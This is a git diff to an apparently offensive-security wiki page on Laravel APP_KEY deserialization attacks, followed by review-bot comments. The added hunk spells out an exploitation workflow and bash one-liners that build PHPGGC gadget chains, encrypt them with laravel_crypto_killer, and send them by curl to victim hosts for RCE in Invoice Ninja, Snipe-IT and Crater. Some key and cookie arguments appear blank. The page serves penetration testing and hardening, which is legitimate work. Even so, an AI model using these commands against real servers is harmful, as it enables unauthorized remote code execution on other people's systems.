diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md index 118ee3e29..a558d24ed 100644 --- a/src/network-services-pentesting/pentesting-web/laravel.md +++ b/src/network-services-pentesting/pentesting-web/laravel.md @@ -64,10 +64,30 @@ The script transparently supports both CBC and GCM payloads and re-generates the | Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 | The exploitation workflow is always: -1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force) -2. Generate gadget with **PHPGGC** -3. `laravel_crypto_killer.py encrypt …` -4. Deliver payload through the vulnerable parameter/cookie → **RCE** +1. Obtain or brute-force the 32-byte `APP_KEY`. +2. Build a gadget chain with **PHPGGC** (for example `Laravel/RCE13`, `Laravel/RCE9` or `Laravel/RCE15`). +3. Encrypt the serialized gadget with **laravel_crypto_killer.py** and the recovered `APP_KEY`. +4. Deliver the ciphertext to the vulnerable `decrypt()` sink (route parameter, cookie, session …) to trigger **RCE**. + +Below are concise one-liners demonstrating the full attack path for each real-world CVE mentioned above: + +```bash +# Invoice Ninja ≤5 – /route/{hash} +php8.2 phpggc Laravel/RCE13 system id -b -f | \ + ./laravel_crypto_killer.py encrypt -k -v - | \ + xargs -I% curl "https://victim/route/%" + +# Snipe-IT ≤6 – XSRF-TOKEN cookie +php7.4 phpggc Laravel/RCE9 system id -b | \ + ./laravel_crypto_killer.py encrypt -k -v - > xsrf.txt +curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login + +# Crater – cookie-based session +php8.2 phpggc Laravel/RCE15 system id -b > payload.bin +./laravel_crypto_killer.py encrypt -k -v payload.bin --session_cookie= > forged.txt +curl -H "Cookie: laravel_session=; =$(cat forged.txt)" https://victim/login +``` + --- 
@@ -180,7 +200,8 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/ ## References -* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html) +* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html) +* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html) * [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) * [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc) * [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
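Review bot: in the first hunk, the new bash block has empty arguments where placeholders appear to have been lost in rendering (`-k -v -`, `--session_cookie=`, and `Cookie: laravel_session=; =$(cat forged.txt)`), so the commands as shown are not self-explanatory and a reader cannot tell which value each flag expects; use placeholders that survive markdown rendering (for example shell variables such as `$APP_KEY`) or escape the angle brackets. The rewritten step 1 also drops the concrete `APP_KEY` sources the old text listed (default examples, Git leak, config/.env leak); keep them, since they are also the locations to audit when hardening a deployment.

Review bot: in the second hunk, the two new Synacktiv entries point at the same article in two languages; consider a single reference line that carries both the (EN) and (FR) links so the list does not look like two distinct sources.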